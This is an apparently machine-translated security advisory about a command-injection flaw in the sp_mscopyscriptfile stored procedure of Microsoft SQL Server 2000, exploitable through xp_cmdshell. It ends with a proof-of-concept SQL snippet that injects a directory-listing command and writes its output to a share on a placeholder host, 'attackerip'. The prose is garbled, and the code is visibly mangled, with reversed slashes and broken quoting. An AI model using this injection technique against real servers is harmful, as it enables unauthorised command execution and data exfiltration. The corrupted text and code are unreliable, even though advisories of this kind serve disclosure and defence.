Published: 2002-07-27
Updated: 2002-07-27
Severe degree: high
Threat: Remote administrator privilege
Error type: Enter verification error
Utilization: Server mode
Bugtraq ID:
5309
CVE (CAN) ID:
CVE-2001-0645
Affected system
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6A
Microsoft SQL Server 2000
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6A
Microsoft SQL Server 2000 Desktop Engine
Microsoft Visio Enterprise Network Tools
Detailed Description
Microsoft SQL Server 2000 contains two processes when copying, and an attacker can operate the input to provide malicious parameters to the storage process, which can cause any command.
The sp_mscopyscriptfile stored procedure is one of the stored procedures of the copy operation. There is a SQL insert vulnerability, the sp_mscopyscriptfile stored procedure can copy the directory replicated by the SQL server, and copy the script file to this directory, one of which is the input parameter @ScriptFile is to copy script files. Name, you can use the OS command to insert in this parameter, and then execute BY XP_CMDSHELL.
To successfully use this vulnerability, you need to have a SQL Server Agent Proxy account, which is not open by default.
Test code
Declare @command varchar (100)
Declare @scripfile varchar (200)
Set concat_null_yields_null off
SELECT @ command = 'DIR C: />
"///attackerip/share/dir.txt" "
SELECT @ scripfile = 'c: /autoexec.bat> NUL "|'
@Command '| RD "
EXEC SP_MSCOPYScriptfile @scripfile, ''
